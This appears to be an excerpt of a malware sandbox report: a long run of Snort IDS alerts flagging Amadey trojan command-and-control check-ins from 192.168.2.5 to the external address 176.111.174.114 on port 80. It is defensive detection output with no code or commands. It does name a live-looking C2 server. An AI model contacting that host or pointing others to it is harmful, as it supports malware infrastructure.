                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49916 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49918 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49919 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49921 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49922 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49923 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49925 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49926 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49927 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49928 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49929 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49935 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49937 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49938 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49939 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49941 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49942 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49943 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49944 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49946 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49948 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49949 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49950 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49951 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49953 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49954 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49955 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49956 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49957 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49958 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49960 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49962 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49963 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49964 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49965 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49966 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49968 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49969 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49970 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49971 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49972 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49974 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49975 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49977 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49978 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49979 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49981 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49982 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49983 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49984 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49986 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49987 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49989 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49990 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49991 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49992 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49994 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49995 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49996 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49997 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:49999 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50000 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50002 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50003 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50005 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50006 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50008 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50009 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50011 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50012 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50014 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50015 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50016 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50017 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50019 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50020 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50022 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50023 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50025 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50026 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50028 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50029 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50030 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50031 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50033 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50034 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50036 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50037 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50038 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50040 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50041 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50042 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50043 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50044 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50046 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50047 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50049 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50050 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50051 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50053 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50054 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50055 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50056 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50058 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50059 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50061 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50062 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50063 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50064 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50066 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50067 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50068 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50069 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50071 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50073 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50074 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50075 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50076 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50079 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50080 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50082 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50083 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50085 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50087 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50088 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50089 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50090 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50091 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50094 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50095 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50097 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50098 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50099 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50101 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50102 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50103 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50104 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50106 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50107 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50109 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50110 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50111 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50112 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50114 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50115 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50116 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50117 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50119 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50120 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50122 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50123 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50124 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50126 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50127 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50128 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50129 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50130 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50132 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50134 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50135 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50136 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50137 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50139 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50140 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50141 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50142 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50144 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50145 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50147 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50148 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50149 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50151 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50152 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50153 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50154 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50156 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50157 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50159 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50160 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50161 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50163 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50164 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50165 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50166 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50168 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50169 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50171 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50172 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50173 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50175 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50176 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50177 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50178 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50179 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50181 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50182 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50184 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50185 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50186 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50188 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50189 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50190 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50191 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50193 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50194 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50196 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50197 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50198 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50200 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50201 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50202 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50203 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50204 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50206 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50208 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50209 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50210 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50211 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50214 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50215 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50216 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50218 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50219 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50221 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50222 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50223 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50225 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50226 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50227 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50228 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50229 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50231 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50233 -> 176.111.174.114:80
                  Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.5:50234 -> 176.111.174.114:80
